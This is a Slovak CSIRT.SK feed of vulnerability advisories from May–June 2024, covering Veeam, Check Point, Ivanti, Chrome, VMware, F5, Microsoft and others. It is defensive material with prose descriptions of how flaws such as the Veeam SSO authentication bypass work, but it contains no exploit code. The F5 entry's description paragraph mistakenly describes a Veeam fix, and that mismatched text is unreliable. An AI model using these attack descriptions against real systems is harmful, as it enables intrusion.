Marian Danko — Fri, 14 Jun 2024 06:07:57 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci máj 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 05/2024 PDF (910 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Zraniteľnosti Veeam

Marian Danko — Thu, 13 Jun 2024 10:44:16 +0000

Spoločnosť Veeam vydala bezpečnostnú aktualizáciu Backup & Replication, ktorá rieši viacero zraniteľností umožňujúcich neoverenému útočníkovi obchádzanie bezpečnostných prvkov, zvýšenie privilégií alebo vzdialené vykonávanie kódu.

Zraniteľné systémy:

Veeam Backup & Replication verzie | 5.0 | 6.1 | 6.5 | 7.0 | 8.0 | 9.0 | 9.5 | 10 | 11 | 12 | 12.1
Veeam Agent for Windows (VAW) verzie 2.0 až 6.1
Veeam Service Provider Console (VSPC) | 4.0 | 5.0 | 6.0 | 7.0 | 8.0

Opis činnosti:

CVE-2024-29849 (CVSS skóre 9,8)

Kritická zraniteľnosť CVE-2024-29849 umožňuje neoverenému útočníkovi prihlásiť sa do webového rozhrania Veeam Backup Enterprise Manager ako ľubovoľný používateľ.

Zraniteľná je služba “Veeam.Backup.Enterprise.RestAPIService.exe”, ktorá beží na porte TCP 9398 a slúži ako server REST API pre webovú aplikáciu. Útočník môže zneužiť túto chybu odoslaním špeciálne vytvoreného tokenu jednotného prihlásenia VMware (SSO) do zraniteľnej služby. Token obsahuje falošnú požiadavku na overenie ako správca a adresu URL servera SSO, ktorú Veeam neoveruje. Token SSO zakódovaný v base64 sa dekóduje a interpretuje ako XML a overuje sa prostredníctvom požiadavky SOAP na adresu URL kontrolovanú útočníkom. Falošný server útočníka odpovie na požiadavku na overenie kladne, čím Veeam overí token a udeľuje útočníkovi prístup správcu.

CVE-2024-29850 (CVSS skóre 8,8)

Zraniteľnosť CVE-2024-29850 umožňuje prevzatie účtu prostredníctvom NTLM relay útoku.

CVE-2024-29851 (CVSS skóre: 7,2)

Chyba CVE-2024-29851 umožňuje privilegovanému používateľovi ukradnúť NTLM hash účtu služby Veeam Backup Enterprise Manager, pokiaľ sa nejedná o prednastavený účet Local System.

Spoločnosť Veeam vyriešila v posledných týždňoch aj ďalšie zraniteľnosti:

CVE-2024-29212 (CVSS skóre: 9,9)

Kritická zraniteľnosť CVE-2024-29212 ovplyvňuje Veeam Service Provider Console a umožňuje vzdialené vykonávanie kódu na serveri.

CVE-2024-29853 (CVSS skóre 7,2)

Chyba CVE-2024-29853 umožňuje lokálne zvýšenie oprávnení vo Veeam Agent pre Windows.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu
Zvýšenie oprávnení
Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia Veeam Backup & Replication na najnovšiu verziu alebo aspoň na verziu 12.1.2.172. Pokiaľ aktualizácia nie je možná, spoločnosť Veeam odporúča zastaviť program Backup Enterprise Manager alebo ďalšie možnosti mitigácie nájdete tu.

Aktualizácia Veeam Agent for Windows aspoň na verziu 6.1.2 (build 6.1.2.134).

Aktualizácia Veeam Service Provider Console aspoň na verziu 7.0.0.18899 alebo 8.0.0.19236.

Odkazy:

https://www.securityweek.com/critical-veeam-vulnerability-leads-to-authentication-bypass/

https://thehackernews.com/2024/05/critical-veeam-backup-enterprise.html

https://nvd.nist.gov/vuln/detail/CVE-2024-28949

https://www.veeam.com/kb4581

https://www.veeam.com/kb4575

https://www.bleepingcomputer.com/news/security/exploit-for-critical-veeam-auth-bypass-available-patch-now/

Grafické procesory ARM Mali majú aktívne zneužívanú zraniteľnosť

Marian Danko — Thu, 13 Jun 2024 10:43:07 +0000

Aktívne zneužívaná zraniteľnosť ovládača grafických procesorov ARM Mali Valhall a Bifrost umožňuje útočníkom bez oprávnení získať prístup k dealokovanej pamäti GPU.

Zraniteľné systémy:

Bifrost GPU Kernel Driver vo verzii r34p0 až r40p0

Valhall GPU Kernel Driver vo verzii r34p0 až r40p0

Opis činnosti:

CVE-2024-4610 (CVSS v3.1 skóre 5,5)

V ovládačoch grafických procesorov ARM Mali série Valhall a Bifrost sa nachádza aktívne zneužívaná zraniteľnosť, ktorá umožňuje lokálnemu útočníkovi bez oprávnení získať prístup k dealokovanej pamäti. Spoločnosť ARM sa vyjadrila, že chyba zabezpečenia umožňuje vykonávať nevhodné operácie s pamätou GPU.

Séria grafických čipov Bifrost sa používa v smartfónoch a tabletoch (Mali G31, G51, G52, G71, G76), kompaktných počítačoch, Chromebookoch a vstavaných systémoch. Sériu Valhall je možné nájsť v high-end smartfónoch a tabletoch (Mali G57, G77), infotainmentových systémoch automobilov a výkonných smart TV.

Závažnosť zraniteľnosti: Stredná

Možné škody:

Vykonávanie ľubovoľného kódu
Neoprávnený prístup k citlivým údajom

Odporúčania:

Bezodkladná aktualizácia Bifrost a Valhall GPU Kernel Driver aspoň na verziu r41p0 (aktuálna verzia je r49p0).

Odkazy:

https://www.bleepingcomputer.com/news/security/arm-warns-of-actively-exploited-flaw-in-mali-gpu-kernel-drivers/

https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities

https://nvd.nist.gov/vuln/detail/CVE-2024-4610

Mesačný prehľad kritických zraniteľností máj 2024

Marian Danko — Thu, 06 Jun 2024 14:04:57 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2024.

Mesačný prehľad – 05/2024 PDF (272kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Útočníci kradnú heslá do VPN cez zraniteľnosť v bezpečnostných bránach spoločnosti Check Point

Marian Danko — Tue, 04 Jun 2024 08:32:35 +0000

Spoločnosť Check Point vydala bezpečnostné aktualizácie pre aktívne zneužívanú zraniteľnosť vedúcu k úniku citlivých informácií, zneužiteľných na prienik do siete a laterálny pohyb v nej. Zraniteľnosť zasahuje bezpečnostné brány Network Security Gateway s povolenými službami Remote Access VPN alebo Mobile Access. Útočníci môžu získať hashe hesiel používateľských účtov a prístup k Active Directory. Zneužitím exfiltrovaných údajov je možné dosiahnuť aj vzdialené vykonanie kódu.

Zraniteľné systémy:

CloudGuard Network
Quantum Maestro
Quantum Scalable Chassis
Quantum Security Gateways
Quantum Spark

Verzie: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20

Opis činnosti:

CVE-2024-24919 (CVSS 3.1 skóre 8,6)

Aktívne zneužívaná zraniteľnosť, ktorá umožňuje vzdialeným útočníkom získať citlivé informácie zo zraniteľných brán Check Point (Security Gateway) s povolenými službami Remote Access VPN alebo Mobile Access. Útočníci môžu získať neoprávnený prístup k všetkým súborom na súborovom systéme zariadenia, vrátane súborov obsahujúcich hashe hesiel lokálnych používateľských účtov, privátnych SSH kľúčov, certifikátov a ďalších súborov s citlivými údajmi. Zneužitím exfiltrovaných údajov je možné dosiahnuť aj vzdialené vykonanie kódu. Útočníci nepotrebujú oprávnenia, ani interakciu obete. Zameriavajú sa na staršie lokálne účty VPN chránené iba heslom, z ktorých dokážu získať hashe hesiel. Tieto môžu slúžiť aj ako servisné účty s prístupom do Active Directory.

Výskumníci spoločnosti watchTowr, ktorí zraniteľnosť analyzovali, dospeli k záveru, že chyba súvisí s nedostatočnou kontrolou požiadaviek HTTP POST, čo umožňuje prechod medzi adresármi a čítanie ľubovoľných súborov. Okrem úniku informácií môže viesť až k schopnosti vzdialene vykonávať kód.

Pri zaznamenaných útokoch získali útočníci prístup k súborom ntds.dit, obsahujúcim informácie o používateľoch v doméne, vrátane hashov hesiel ich doménových účtov. Dokázali sa tiež laterálne pohybovať po sieti a zneužili Visual Studio Code pre prenos škodlivých požiadaviek.

Spoločnosť Check Point vydala hotfix, ktorý automaticky blokuje a loguje pokusy o prihlásenie pomocou slabých hesiel.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Únik citlivých informácií
Prienik do siete
Vzdialené vykonávanie kódu

Odporúčania:

Výrobca odporúča nasadiť hotfix pre zraniteľné verzie a vykonať mitigačné opatrenia, ktoré popisuje na svojom webe. Okrem iného viaceré zdroje odporúčajú:

odstrániť lokálnych používateľov na zraniteľných zariadeniach,
pokiaľ tieto kontá potrebujete, pridajte k heslu ďalší faktor pre autentifikáciu,
vynútiť zmeny hesiel,
skontrolovať prístupové logy na prípadnú kompromitáciu. Skorelovať prihlásenia heslom s aktivitou môžete napríklad v SmartConsole dopytom action:”Log In” AND auth_method:Password AND blade:”Mobile Access”.

Zdroje:

https://support.checkpoint.com/results/sk/sk182336

https://blog.checkpoint.com/security/enhance-your-vpn-security-posture

https://www.bleepingcomputer.com/news/security/check-point-vpn-zero-day-exploited-in-attacks-since-april-30/

https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/

https://nvd.nist.gov/vuln/detail/CVE-2024-24919

Bezpečnostné zraniteľnosti v produktoch Ivanti

Marian Danko — Tue, 28 May 2024 06:28:16 +0000

Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v produktoch Avalanche, Neurons for ITSM, Neurons for ITAM, Connect Secure, Policy Secure, Secure Access a Endpoint Manager. Najzávažnejšie sú kritické zraniteľnosti v produkte Endpoint Manager, ktoré možno zneužiť na vykonanie škodlivého kódu.

Zraniteľné systémy:

Ivanti Avalanche vo verzii staršej ako 6.4.3.602
Ivanti Neurons for ITSM (cloud aj premise) všetky verzie bez aktualizácie Hotfix 2
Ivanti Neurons for ITAM (cloud aj premise) všetky verzie bez aktualizácie Hotfix 2
Ivanti Connect Secure vo verziách starších ako 9.1R18.6, 22.7R2 a 22.5R2.4
Ivanti Policy Secure vo verzii staršej ako 22.7R1
Ivanti Secure Access vo verzii staršej ako 22.7R1
Ivanti Endpoint Manager vo verziách 2022 SU5 a starších

Opis činnosti:

Spoločnosť Ivanti vydala bezpečnostné aktualizácie na svoje portfólio produktov, ktoré opravujú 16 bezpečnostných zraniteľností, z toho 6 kritických a 10 vysoko závažných. Kritické zraniteľnosti v produkte Endpoint Manager (CVE-2024-29822, CVE-2024-29823, CVE-2024-29824, CVE-2024-29825, CVE-2024-29826, CVE-2024-29827) by neautentifikovaný útočník nachádzajúci sa v rovnakej sieti mohol zneužiť na vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, vykonanie kódu, zneprístupnenie služby a vykonanie neoprávnených zmien v systéme.

Ivanti Endpoint Manager

CVE-2024-29822, CVE-2024-29823, CVE-2024-29824, CVE-2024-29825, CVE-2024-29826, CVE-2024-29827 (CVSS skóre 9,6)

Kritické bezpečnostné zraniteľnosti v komponente Core server umožňujú vykonanie SQL injekcie. Neautentifikovaný útočník nachádzajúci sa v rovnakej sieti by ich mohol zneužiť na vykonanie škodlivého kódu.

CVE-2024-29828, CVE-2024-29829, CVE-2024-29830, CVE-2024-29846 (CVSS skóre 8,4)

Bližšie nešpecifikované zraniteľnosti v komponente Core server by autentifikovaný útočník s oprávneniami administrátora prostredníctvom SQL injekcie mohol zneužiť na vykonanie škodlivého kódu. Zneužitie zraniteľností vyžaduje, aby sa útočník nachádzal v rovnakej sieti ako zraniteľná inštalácia produktu.

Ivanti Neurons for ITSM, Ivanti Neurons for ITAM

CVE-2024-22059 (CVSS skóre 8,8)

Zraniteľnosť sa nachádza vo webovom komponente produktu a vzdialený autentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na čítanie a modifikáciu obsahu databázy a následné zneprístupnenie služby.

CVE-2024-22060 (CVSS skóre 8,7)

CVE-2024-22060 vo webovom komponente umožňuje vzdialenému autentifikovanému útočníkovi s vysokými oprávneniami upload ľubovoľných súborov do priečinkov servera ITSM, v ktorých sú ukladané citlivé údaje.

Pozn.: Spoločnosť Ivanti automaticky aktualizovala cloudové inštalácie Neurons for ITSM a Neurons for ITAM. Manuálna inštalácia aktualizácií je nutná len na lokálnych (on premise) inštaláciách produktu.

Ivanti Connect Secure, Ivanti Policy Secure

CVE-2023-38551 (CVSS skóre 8,2)

Zraniteľnosť s označením CVE-2023-38551 spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený autentifikovaný používateľ s vysokými oprávneniami by ju prostredníctvom CRLF injekcie mohol zneužiť na realizáciu XSS (Cross Site Scripting) útokov.

Ivanti Secure Access

CVE-2023-38042 (CVSS skóre 7,8), CVE-2023-46810 (CVSS skóre 7,3)

Zraniteľnosti v klientskych aplikáciách Ivanti Secure Access pre Windows a Linux umožňujú eskaláciu privilégií lokálneho autentifikovaného útočníka a následné vykonanie kódu s oprávneniami úrovne SYSTEM.

Ivanti Avalanche

CVE-2024-29848 (CVSS skóre 7,2)

CVE-2024-29848 nachádzajúca sa v komponente FileStoreConfig umožňuje autentifikovanému útočníkovi upload ľubovoľných súborov a následné vykonanie škodlivého kódu s oprávneniami SYSTEM.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vykonanie kódu
Zneprístupnenie služby
Eskalácia privilégií
Neoprávnená zmena v systéme

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie:

Ivanti Avalanche na verziu 6.4.3.602
Ivanti Neurons for ITSM (lokálne inštalácie) na verzie 2023.1 Hotfix 2, 2023.2 Hotfix 2, 2023.3 Hotfix 2 alebo 2023.4 Hotfix 2
Ivanti Neurons for ITAM (lokálne inštalácie) na verzie 2023.1 Hotfix 2, 2023.2 Hotfix 2, 2023.3 Hotfix 2 alebo 2023.4 Hotfix 2
Ivanti Connect Secure na verzie 9.1R18.6, 22.7R2 alebo 22.5R2.4
Ivanti Policy Secure na verziu 22.7R1
Ivanti Secure Access na verziu 22.7R1 a vyššie
Ivanti Endpoint Manager na verziu 2022 SU5 so Security Hot patch z mája 2024

Zdroje:

https://forums.ivanti.com/s/article/Security-Advisory-May-2024

https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed

https://forums.ivanti.com/s/article/KB-CVE-2024-22059-and-CVE-2024-22060-for-Ivanti-Neurons-for-ITSM

https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Connect-Secure-Ivanti-Policy-Secure-May-2024

https://forums.ivanti.com/s/article/KB-Security-Advisory-Ivanti-Secure-Access-Client-May-2024

https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024

Aktívne zneužívané zero day zraniteľnosti Google Chrome

Marian Danko — Wed, 22 May 2024 07:35:27 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie na opravu troch zero-day zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti sú aktívne zneužívané útočníkmi, odporúčame bezodkladnú aktualizáciu.

Zraniteľné systémy:

Google Chrome (Windows, Mac) staršie ako 125.0.6422.60/.61, 125.0.6422.60 (Linux)

Opis činnosti:

CVE-2024-4947

Zero day zraniteľnosť CVE-2024-4947 sa týka chyby neoverenia typu premennej v komponente V8 a umožňuje útočníkom zápis alebo čítanie pamäte mimo povolené hranice vyrovnávacej pamäte. Na zraniteľnosť poukázali výskumníci Vasilij Berdnikov a Boris Larin z bezpečnostnej spoločnosti Kaspersky. Úspešné zneužitie zraniteľnosti by mohlo viesť k vykonávaniu kódu, čo môže napríklad, ohroziť citlivé údaje používateľov.

CVE-2024-4671

Vysoko závažná zraniteľnosť CVE-2024-4671 umožňuje zneužiť dealokované miesto pamäte v komponente Visuals a môže viesť k vykonávaniu kódu alebo vyvolať pád aplikácie.

CVE-2024-4761

Zero day zraniteľnosť CVE-2024-4761 je chyba zápisu mimo povolené hodnoty v komponentoch V8 a WebAssembly. Úspešné zneužitie umožňuje útočníkom vykonávanie kódu alebo vyvolať pád aplikácie.

Zraniteľnosti CVE-2024-4947, CVE-2024-4761 a CVE-2024-4671 sú aktívne zneužívané.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Pád aplikácie
Vykonávanie kódu
Prístup k citlivým informáciám

Odporúčania:

Odporúčame bezodkladnú aktualizáciu na najnovšiu možnú verziu prehliadača Google Chrome (minimálne 125.0.6422.60/.61 (Windows, Mac) a 125.0.6422.60 (Linux)).

Odkazy:

https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html

https://www.zdnet.com/article/google-patches-zero-day-exploit-in-chrome-what-you-need-to-know/#ftag=RSSbaffb68

https://www.bleepingcomputer.com/news/google/google-fixes-CVE-2024-4947-third-actively-exploited-chrome-zero-day-in-a-week/

https://thehackernews.com/2024/05/chrome-zero-day-alert-update-your.html

https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html

https://thehackernews.com/2024/05/new-chrome-zero-day-vulnerability-cve.html

Bezpečnostné zraniteľnosti v produktoch VMware Workstation a Fusion

Marian Danko — Mon, 20 May 2024 10:40:46 +0000

Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v produktoch VMware Workstation a Fusion, z toho je 1 označená ako kritická. Zraniteľnosti možno zneužiť na vzdialené vykonanie škodlivého kódu, zneprístupnenie služby a neoprávnený prístup k citlivým údajom.

Zraniteľné systémy:

VMware Workstation vo verzii 17.X staršej ako 17.5.2
VMware Fusion vo verzii 13.X staršej ako 13.5.2

Opis činnosti:

Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v hypervízoroch VMware Workstation a Fusion. Najzávažnejšia je kritická zraniteľnosť nachádzajúca sa v komponente VBLUETOOTH, ktorá umožňuje vzdialené vykonanie škodlivého kódu.

CVE-2024-22267 (CVSS skóre 9,3)

Kritická zraniteľnosť s označením CVE-2024-22267 sa nachádza v komponente VBLUETOOTH a umožňuje použiť dealokované miesto v pamäti. Úspešné zneužitie si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje vykonávanie kódu na hostiteľskom systéme v rámci procesu VMX.

CVE-2024-22268 (CVSS skóre 7,1)

CVE-2024-22268 sa nachádza vo funkcionalite SHADER. Lokálny útočník s používateľským prístupom na virtuálnom počítači so zapnutou 3D grafikou by prostredníctvom pretečenia medzipamäte mohol spôsobiť zneprístupnenie služby.

CVE-2024-22269, CVE-2024-22270 (CVSS skóre 7,1)

Zraniteľnosti v komponente VBLUETOOTH a funkcionalite HGFS (Host Guest File Sharing) umožňujú získanie neoprávneného prístupu k citlivým údajom. Úspešné zneužitie zraniteľností si vyžaduje lokálne administrátorské oprávnenia na virtuálnom počítači a umožňuje prístup k dátam uloženým v pamäti hypervízora.

Možné škody:

Vzdialené vykonanie kódu
Zneprístupnenie služby
Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladne aktualizovať zraniteľné systémy, VMware Workstation aspoň na verziu 17.5.2 a VMware Fusion aspoň na 13.5.2.

Zdroje:

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280

Bezpečnostné zraniteľnosti v BIG-IP Next Central Manager

Marian Danko — Fri, 17 May 2024 11:23:35 +0000

Spoločnosť F5 vydala bezpečnostné aktualizácie na svoj produkt BIG-IP Next Central Manager, ktoré možno zneužiť na vykonanie SQL a OData injekcie a následné získanie úplnej kontroly nad zraniteľnými systémami.

Zraniteľné systémy:

BIG-IP Next Central Manager vo verzii 20.X staršej ako 20.2.0

Opis činnosti:

Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console. Zneužitie zraniteľnosti umožňuje vzdialené vykonanie škodlivého kódu. Na uvedené zraniteľnosti sú dostupné proof-of-concept kódy demonštrujúce mechanizmus ich zneužitia.

CVE-2024-26026 (CVSS skóre 8,6)

CVE-2024-26026 spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu SQL injekcie, získanie citlivých údajov, obídenie autentifikácie a následné získanie úplnej kontroly nad systémom.

CVE-2024-21793 (CVSS skóre 7,5)

Zraniteľnosť s označením CVE-2024-21793 spočíva v nesprávnom spracovávaní OData dopytov, ktoré umožňuje injekciu do parametra „filter“. Zneužitím zraniteľnosti možno získať neoprávnený prístup k citlivým údajom ako sú napr. prihlasovacie údaje administrátorských účtov pre získanie úplnej kontroly nad systémom. Zraniteľnosť je možné zneužiť len v prípade, že je aktivované overovanie prostredníctvom LDAP. Útočník nepotrebuje autentifikáciu.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme

Odporúčania:

Výrobca odporúča aktualizovať zraniteľné BIG-IP Next Central Manager na verziu 20.2.0 a prostredníctvom sieťových a bezpečnostných prvkov umožňovať prístup k manažmentovým rozhraniam produktov F5 len z dôveryhodných zariadení a sietí.

Zdroje:

https://my.f5.com/manage/s/article/K000138732

https://my.f5.com/manage/s/article/K000138733

https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/

Kritická zraniteľnosť manažmentového nástroja Veeam Service Provider Console

Marian Danko — Fri, 17 May 2024 11:22:19 +0000

Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť nástroja Veeam Service Provider Console, slúžiaceho na centralizovaný manažment prostredí využívajúcich technologické riešenia od Veeam.

Zraniteľné systémy:

Veeam Service Provider Console vo verzii 4.0 (ukončená technická podpora)
Veeam Service Provider Console vo verzii 5.0 (ukončená technická podpora)
Veeam Service Provider Console vo verzii 6.0 (ukončená technická podpora)
Veeam Service Provider Console vo verzii 7.0 staršej ako 7.0.0.18899
Veeam Service Provider Console vo verzii 8.0 staršej ako 8.0.0.19236

Opis činnosti:

CVE-2024-29212 (CVSS skóre 9,9)

Kritická zraniteľnosť spočíva v nesprávnej metóde deserializácie využívanej v rámci vzájomnej komunikácie manažmentových agentov a ich komponentov. Vzdialený autentifikovaný útočník s oprávneniami používateľa by ju mohol zneužiť na vykonanie škodlivého kódu na serveroch Veeam Service Provide Console.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy aktualizovať na verzie 7.0.0.18899 a 8.0.0.19236.

Zdroje:

https://www.veeam.com/kb4575

https://socradar.io/veeam-service-provider-console-affected-by-severe-rce-vulnerability-cve-2024-29212/

Microsoft v rámci Patch Tuesday opravil aktívne zneužívané zero-day zraniteľnosti

Marian Danko — Thu, 16 May 2024 07:14:35 +0000

Spoločnosť Microsoft vydala v máji 2024 balík opráv pre portfólio svojich produktov opravujúci 61 zraniteľností, z ktorých 28 umožňuje vzdialené vykonávanie kódu. Tri zraniteľnosti sú typu zero-day a dve z nich sú aktívne zneužívané.

Zraniteľné systémy:

.NET 7.0
.NET 8.0
Azure Migrate
Dynamics 365 Customer Insights
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Bing Search for iOS
Microsoft Edge (Chromium-based)
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Intune Mobile Application Management for Android
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.4
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Microsoft Visual Studio 2022 version 17.9
Office Online Server
PowerBI-client JS SDK
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 61 zraniteľností, z toho je 1 kritická a 3 zero-day. Najzávažnejšie zraniteľnosti umožňujú vzdialené vykonanie kódu, eskaláciu privilégií, získanie neoprávneného prístupu k citlivým údajom, obídenie bezpečnostných prvkov, či zneprístupnenie služby. Zero-day zraniteľnosti CVE-2024-30040 a CVE-2024-30051 sú aktívne zneužívané.

CVE-2024-30044 (CVSS skóre 8,8)

Kritická zraniteľnosť v produkte Microsoft SharePoint Server umožňuje vzdialenému autentifikovanému útočníkovi s oprávneniami „Site Owner“ vykonať škodlivý kód v kontexte SharePoint servera. Zraniteľnosť je možné zneužiť uploadovaním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k deserializácii parametrov tohto súboru.

CVE-2024-30040 (CVSS skóre 8,8)

Aktívne zneužívaná zero-day zraniteľnosť operačného systému Windows sa nachádza v komponente MSHTML Platform a jej zneužitie umožňuje obídenie bezpečnostných prvkov pre riadenie COM/OLE a následné vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje interakciu používateľa, ktorý musí stiahnuť špeciálne vytvorený súbor (nemusí ho nevyhnutne otvoriť).

CVE-2024-30051 (CVSS skóre 7,8)

Zero-day zraniteľnosť v knižnici Windows DWM Core Library by lokálny autentifikovaný útočník s oprávneniami štandardného používateľa mohol prostredníctvom zaslania špeciálne vytvorenej požiadavky zneužiť na eskaláciu privilégií (úroveň SYSTEM) a získanie úplnej kontroly nad systémom. Spoločnosť KASPERSKY informovala o phishingových kampaniach, ktoré túto zraniteľnosť aktívne zneužívajú na šírenie malvéru QAKBOT.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Falšovanie identity
Zneprístupnenie služby
Obídenie bezpečnostných prvkov
Neoprávnená zmena v systéme

Odporúčania:

Bezodkladné nasadenie májového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete tu.

Zdroje:

https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-patch-tuesday-fixes-3-zero-days-61-flaws/

https://securelist.com/cve-2024-30051/112618/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30044

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30040

https://exchange.xforce.ibmcloud.com/vulnerabilities/290496

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-30051

https://exchange.xforce.ibmcloud.com/vulnerabilities/290497

Mesačná správa CSIRT.SK – apríl 2024

Marian Danko — Wed, 15 May 2024 12:00:48 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci apríl 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 04/2024 PDF (993 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás .

Mesačný prehľad kritických zraniteľností apríl 2024

Marian Danko — Tue, 14 May 2024 11:42:32 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci apríl 2024.

Mesačný prehľad – 04/2024 PDF (264 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kampaň botnetu „Goldoon“ zneužíva starú kritickú zraniteľnosť D-Link

Marian Danko — Thu, 09 May 2024 07:02:40 +0000

Bezpečnostní výskumníci z FortiGuard poukázali na novú útočnú kampaň šíriacu malvér/botnet Goldoon, ktorá sa zameriava na routery D-Link. Počas apríla sa dvojnásobne zvýšil nárast útokov na bezpečnostnú chybu s označením CVE-2015-2051. Zaujímavosťou je, že táto zraniteľnosť je už takmer desať rokov stará.

Zraniteľné systémy:

DAP-1522
DAP-1650
DIR-300
DIR-600
DIR-645
DIR-806
DIR-815
DIR-816L
DIR-860L
DIR-865L
DIR-880L

Opis činnosti:

